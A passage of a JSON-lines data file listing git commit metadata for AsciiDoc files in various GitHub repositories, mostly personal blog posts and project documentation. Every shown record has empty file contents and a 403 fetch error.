'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9943cdd3bb5f9087986ae0f00d516781d0bc403","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527ae7ecf8bedfb63ed0f5be870a4bd91f007885","subject":"Update 2018-01-20-Bitrise.adoc","message":"Update 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871c13293baf4fbaee63447611e32c33499056ad","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43e81b6804b7398ad8c0f3d376091f3fe784c0fd","subject":"Update 2017-10-13-Nihayet.adoc","message":"Update 
2017-10-13-Nihayet.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-13-Nihayet.adoc","new_file":"_posts\/2017-10-13-Nihayet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178ee50a970c49c578b6f82fa0470abc742f142a","subject":"Add ClojuTRE 2017","message":"Add ClojuTRE 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojutre.adoc","new_file":"content\/events\/2017\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f191a0acf8cb50d4c0793d36e7ae426a448dc11b","subject":"Getting current ASDF version","message":"Getting current ASDF version\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8e5c33a7b604e7c2336c8a7da96ff8018ddddf8b","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd011cb0b37c3e2494586988bee1d84cb504f2cd","subject":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","message":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28a799969bdce88d0de7faf38077e36ba2807e2d","subject":"Update 2017-09-24-Backdoor-CTF-2017.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1170949f208e29b4b6c1f8208840e12524a385c5","subject":"rust: add python porting notes","message":"rust: add python porting 
notes\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"rust\/python-prorting.adoc","new_file":"rust\/python-prorting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cc846709549c73ba5d03c8b0dc41d18e4ccabc0","subject":"Add FAQs - add truename","message":"Add FAQs - add truename\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2c121a034e33a5aee480e3332c2b28f38bcd35d7","subject":"Added Act-As-User docs","message":"Added Act-As-User docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"078a6827e8e701b5cef3a328b460384ca26b082d","subject":"Draft for CNV1598. assembly to cover prereq for cnv install","message":"Draft for CNV1598. assembly to cover prereq for cnv install\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"cnv\/cnv_install\/preparing-cluster-for-cnv.adoc","new_file":"cnv\/cnv_install\/preparing-cluster-for-cnv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"290cbbb8b29e254c8b8b72205ea8f5b69c476509","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54380f977c9ec0251e86240f1dee47a4198d54ca","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"591ca2350f71687ab24f5eaee0bda920f3c79afb","subject":"Update 
2015-06-08-My-title.adoc","message":"Update 2015-06-08-My-title.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title.adoc","new_file":"_posts\/2015-06-08-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f6a536fb616d45c5f3660b7fa2c9177811b5cab","subject":"Update 2017-01-31-New-blog.adoc","message":"Update 2017-01-31-New-blog.adoc","repos":"Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io","old_file":"_posts\/2017-01-31-New-blog.adoc","new_file":"_posts\/2017-01-31-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adyrhan\/adyrhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86fd6bc9cf151ffbdf020fab5298d598ebc3ea08","subject":"Update 2017-04-06-Cucumber.adoc","message":"Update 2017-04-06-Cucumber.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-04-06-Cucumber.adoc","new_file":"_posts\/2017-04-06-Cucumber.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"489b863ea753ce70298f43f7bdf426ff0ccecf70","subject":"Update 2015-11-23-Colores-en-tu-terminal.adoc","message":"Update 2015-11-23-Colores-en-tu-terminal.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-23-Colores-en-tu-terminal.adoc","new_file":"_posts\/2015-11-23-Colores-en-tu-terminal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3af45c08bde27ce9a1334f4ca39c067c671844b","subject":"add send mail file","message":"add send mail file\n","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-07-18-Send-mail-via-python.adoc","new_file":"_posts\/2017-07-18-Send-mail-via-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c37c7931f49525b9c61eaf0fafb6fd35029d0b","subject":"Added History file.","message":"Added History file.\n","repos":"jprichardson\/node-fs-extra,reggi\/node-fs-extra,Narigo\/node-fs-extra,JanMattner\/node-fs-extra,SciSpike\/node-fs-extra,KoryNunn\/node-fs-extra,snuggles08\/node-fs-extra","old_file":"HISTORY.asciidoc","new_file":"HISTORY.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggi\/node-fs-extra.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcf3723a3fcd2c00b1ce340f242aa776e4318fd6","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 
2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b5468961faf384fd737aa9bb4fce44683924120","subject":"api-management draft","message":"api-management draft\n","repos":"redhat-helloworld-msa\/helloworld-msa","old_file":"api-management.adoc","new_file":"api-management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-helloworld-msa\/helloworld-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c30f9e1578348982d5d61ed085b816e1f281b01","subject":"Update 2015-12-06-C-Q-R-S-en-C.adoc","message":"Update 2015-12-06-C-Q-R-S-en-C.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-12-06-C-Q-R-S-en-C.adoc","new_file":"_posts\/2015-12-06-C-Q-R-S-en-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e397eb8ce54e03d6884843d71fcab90f168adf","subject":"Update 2016-01-18-syslog-audit.adoc","message":"Update 2016-01-18-syslog-audit.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-18-syslog-audit.adoc","new_file":"_posts\/2016-01-18-syslog-audit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2270f6c3752cea0cf6154b7d082a7a8e18f5be93","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkent-at-rivermeadow-dot-com\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c954faf1f66dac551424634886cecf38109d6f8","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ad018424686fc3cc99131598bc1d2edb9bf79b","subject":"Delete the file at 
'2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","message":"Delete the file at '2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333c249dd253c4a48a892800030f8038293f3ffb","subject":"Update 2016-12-23-How-to-partially-match-in-object-array.adoc","message":"Update 2016-12-23-How-to-partially-match-in-object-array.adoc","repos":"xinmeng1\/note,xinmeng1\/note,xinmeng1\/note,xinmeng1\/note","old_file":"_posts\/2016-12-23-How-to-partially-match-in-object-array.adoc","new_file":"_posts\/2016-12-23-How-to-partially-match-in-object-array.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xinmeng1\/note.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64e23f9da0a2fe4054ee7127c8aed24665a6b48","subject":"INFUND-6393 add adocs","message":"INFUND-6393 add adocs\n\n\nFormer-commit-id: d77d92563958736962312f4cff64334cab3e345d","repos":"InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service","old_file":"ifs-data-service\/src\/docs\/asciidoc\/competitionSetupFinance.adoc","new_file":"ifs-data-service\/src\/docs\/asciidoc\/competitionSetupFinance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InnovateUKGitHub\/innovation-funding-service.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359b0e29153f1906a240aac1d397a2f59390e17e","subject":"Fix typo MySQL and add link","message":"Fix typo MySQL and add link","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e50b110b099c63b632ba222d806f429c411c69","subject":"Update 2016-03-02-Y-J-Soft-Github.adoc","message":"Update 2016-03-02-Y-J-Soft-Github.adoc","repos":"YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io","old_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YJSoft\/yjsoft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e14896ddb1bd29c44b3188d80ad80d1557d60a","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 
2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7efc180e6c053c06ea29858edc2dea3eb9c46305","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ca5240905585fd5d50ad7dd07d1b3b1250ae3d0","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"spring\/demo-retry\/readme.adoc","new_file":"spring\/demo-retry\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6544b960813aed5206da24962257f5072290417b","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e6b0896c105a76923787cddf456ce977528f46d","subject":"Update 2016-03-18-Hacking-Health-Camp-2016.adoc","message":"Update 2016-03-18-Hacking-Health-Camp-2016.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-03-18-Hacking-Health-Camp-2016.adoc","new_file":"_posts\/2016-03-18-Hacking-Health-Camp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80291bccc5d3bc94334edbbd605477e8b52a8652","subject":"Update 2016-11-09-231100-Wednesday-Evening.adoc","message":"Update 2016-11-09-231100-Wednesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-231100-Wednesday-Evening.adoc","new_file":"_posts\/2016-11-09-231100-Wednesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e35f51a41df86705959716ffc2ba2ca91bd202d","subject":"y2b create post Little Big Planet 2 Collector's Edition Unboxing \\u0026 Overview in HD!","message":"y2b create post Little Big Planet 2 Collector's Edition Unboxing \\u0026 Overview in HD!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-18-Little-Big-Planet-2-Collectors-Edition-Unboxing-u0026-Overview-in-HD.adoc","new_file":"_posts\/2011-01-18-Little-Big-Planet-2-Collectors-Edition-Unboxing-u0026-Overview-in-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59ce6655652f110a8b01c4399b966f5fb58ae720","subject":"y2b create post Sega Genesis Unboxing","message":"y2b create post Sega Genesis Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-08-Sega-Genesis-Unboxing.adoc","new_file":"_posts\/2014-06-08-Sega-Genesis-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca2ea9117d8a557ac518e74a28c57eea06f4e57a","subject":"Update 2017-08-10-Episode-109-Work-Work.adoc","message":"Update 2017-08-10-Episode-109-Work-Work.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-08-10-Episode-109-Work-Work.adoc","new_file":"_posts\/2017-08-10-Episode-109-Work-Work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97e486a1e9c7f5a74f1ba762905b6c05e83240d5","subject":"Added failover load balancing EIP docs","message":"Added failover load balancing EIP 
docs\n","repos":"tadayosi\/camel,DariusX\/camel,tadayosi\/camel,jonmcewen\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,jamesnetherton\/camel,gautric\/camel,tdiesler\/camel,gautric\/camel,sverkera\/camel,ullgren\/camel,sverkera\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,onders86\/camel,tadayosi\/camel,cunningt\/camel,onders86\/camel,snurmine\/camel,jonmcewen\/camel,rmarting\/camel,jamesnetherton\/camel,dmvolod\/camel,apache\/camel,pax95\/camel,curso007\/camel,jonmcewen\/camel,onders86\/camel,punkhorn\/camel-upstream,dmvolod\/camel,gnodet\/camel,mcollovati\/camel,kevinearls\/camel,zregvart\/camel,sverkera\/camel,pmoerenhout\/camel,DariusX\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,gnodet\/camel,davidkarlsen\/camel,kevinearls\/camel,rmarting\/camel,pmoerenhout\/camel,jamesnetherton\/camel,apache\/camel,tadayosi\/camel,snurmine\/camel,dmvolod\/camel,Fabryprog\/camel,jonmcewen\/camel,jamesnetherton\/camel,mcollovati\/camel,gautric\/camel,nicolaferraro\/camel,rmarting\/camel,objectiser\/camel,mcollovati\/camel,kevinearls\/camel,gnodet\/camel,tdiesler\/camel,nikhilvibhav\/camel,objectiser\/camel,zregvart\/camel,alvinkwekel\/camel,kevinearls\/camel,snurmine\/camel,akhettar\/camel,snurmine\/camel,pmoerenhout\/camel,snurmine\/camel,onders86\/camel,curso007\/camel,sverkera\/camel,Fabryprog\/camel,tadayosi\/camel,jonmcewen\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,akhettar\/camel,tdiesler\/camel,christophd\/camel,jamesnetherton\/camel,dmvolod\/camel,nikhilvibhav\/camel,onders86\/camel,objectiser\/camel,rmarting\/camel,anoordover\/camel,Fabryprog\/camel,christophd\/camel,akhettar\/camel,CodeSmell\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,adessaigne\/camel,anoordover\/camel,kevinearls\/camel,onders86\/camel,CodeSmell\/camel,mcollovati\/camel,gnodet\/camel,nicolaferraro\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,anoordover\/camel,tdiesler\/camel,dmvolod\/camel,anoordover\/camel,punkhorn\/camel-upstream,gautric\/camel,rmarting\/camel,snurmine\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,christophd\/camel,curso007\/camel,alvinkwekel\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,zregvart\/camel,DariusX\/camel,gnodet\/camel,pmoerenhout\/camel,curso007\/camel,curso007\/camel,nikhilvibhav\/camel,cunningt\/camel,jamesnetherton\/camel,gautric\/camel,christophd\/camel,anoordover\/camel,pax95\/camel,davidkarlsen\/camel,nicolaferraro\/camel,anoordover\/camel,sverkera\/camel,dmvolod\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,ullgren\/camel,pmoerenhout\/camel,CodeSmell\/camel,objectiser\/camel,akhettar\/camel,akhettar\/camel,rmarting\/camel,gautric\/camel,sverkera\/camel,punkhorn\/camel-upstream,DariusX\/camel,christophd\/camel,cunningt\/camel,akhettar\/camel,Fabryprog\/camel,pax95\/camel,curso007\/camel,cunningt\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/failover-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/failover-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"311a0d9ed16b61350cb690451ed4fa37ec1ee0ad","subject":"Set numbered attribute on documentation.","message":"Set numbered attribute on 
